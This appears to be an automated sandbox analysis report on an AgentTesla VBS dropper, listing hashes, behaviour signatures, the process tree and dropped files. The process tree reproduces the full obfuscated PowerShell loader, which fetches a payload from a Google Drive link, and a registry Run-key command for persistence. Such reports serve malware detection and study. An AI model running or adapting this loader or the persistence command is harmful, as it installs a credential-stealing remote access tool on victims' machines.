Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-06-2024 14:56

General

  • Target

    09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs

  • Size

    91KB

  • MD5

    44d9ad2f0db6d4cb899d6657974c817b

  • SHA1

    1a76e0f99bffc9a92c8578f87538f2efb2b94ec9

  • SHA256

    09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19

  • SHA512

    09b6a077beed527f4756d9d20f696a66976537e1fcef947fa29ac8e8f9c761be83297a07920e050f4df1ca16d41b11b51298d9d72f45ad352e5166fd95a68c8b

  • SSDEEP

    1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5XRyz29KWFj:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMZ

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
        3⤵
          PID:3420
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4232
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
            4⤵
              PID:632
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3412
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3312
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1704
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5240 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:4648

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

          Filesize

          4KB

          MD5

          23da8c3612b391292f5cdc51f7bcb018

          SHA1

          eb345ba5705c1e629c8c44198b812619229693d3

          SHA256

          6cbc26e82f2a553f9828216b6851b859f57f05df2350666818965cd1e0064a28

          SHA512

          612c76f6045e861bbe0554ac69a57357bcfd68dbab0954e78db1009d5a71e551704880847f146dc43f934d4a8ce9d5e9b4b163a8acdb5401f44a2ef65ee790e7

        • C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

          Filesize

          4KB

          MD5

          712c85f7347b1b9f2288a220c96b841e

          SHA1

          790e35b7d500cea6961c44011d958a2013768378

          SHA256

          70187e88c8446bdaa3eb7ea3bfc0db33c1f2e9641b5db95d0fa22dad724eb981

          SHA512

          1881a8c4156b12745c414736b68b21df4113dbf9c2744b04d6bbfe7dbc7f7336293b5cdc8008eafb59afa4314affec831d83d6d3b34d3e36b25d831e40cdd972

        • C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

          Filesize

          446B

          MD5

          4b9bc21c7f74f2fd1c8ef11ea8c09490

          SHA1

          296a36eb7687b0436228329baa38f0256f13cd4d

          SHA256

          254427b2bba5cc34f90ad8877a55e16062511b746870497c596a215d2e3eb949

          SHA512

          ed794cc51a27af7a6e571f68b854f1ac004c16c943939863e7a51e3dae449425f45d78445bfd24710823481ce4acfc61c92d639a4b14da52f67d1f41455f464a

        • C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

          Filesize

          3KB

          MD5

          62848a3b8e3b67b5b36a517ad40a402a

          SHA1

          31db8d0589625d582c55a87c7877fcaa8c1b19ff

          SHA256

          e070df27506a03e268388353f1de976f4e7c9c5ab152a48d8dc80f87c78ddd4e

          SHA512

          912cc731a569a3ee5c0f8c1f902c76f358e8366385f24d9bb59f8fffc530c408f7429c67dc3dab05b280f1903a8cc9fec6c927cd7c5daa3b27a1beb4a278a6ac

